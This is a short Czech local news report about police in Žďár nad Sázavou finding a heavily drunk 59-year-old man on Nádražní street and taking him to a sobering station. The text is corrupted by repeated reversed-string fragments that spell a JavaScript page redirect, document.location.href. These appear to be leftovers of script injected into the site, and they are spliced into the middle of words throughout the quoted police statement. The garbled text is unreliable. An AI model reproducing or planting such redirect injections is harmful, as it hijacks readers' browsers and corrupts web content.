Rainbow page separator

V Nádražní ulici se povaloval opilý muž, nadýchal 2,64 promile

Pátek, 23. listopadu 2018

Žďár nad Sázavou / V úterý kolem půl sedmé večer vyjížděli na základě hlášky na linku tísňového volání policisté do žďárské Nádražní ulice. Na chodníku tam ležel muž.
„Operační důs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojník na uvedené mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ihned vyslal policejní hlídku. Policisté zjistili, že se jedná o devětapadesátiletého muže. Ten vykazoval známky značné opilosti, povaloval se po chodníku a nebyl schopen vstát a samostatně se pohybovat. Dechová zkouška na pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost alkoholu, kterou u něj policisté provedli, vykázala naměřenou hodnotu 2,64 promile,“ informovala policejní mluvčí Stanislava Miláčková.
Dodala, že vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že opilec svým jednáním ohrožoval svůj život a zdraví, policisté ho následně zajistili a eskor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali do protialkoholní záchytné stanice k vystřízlivění.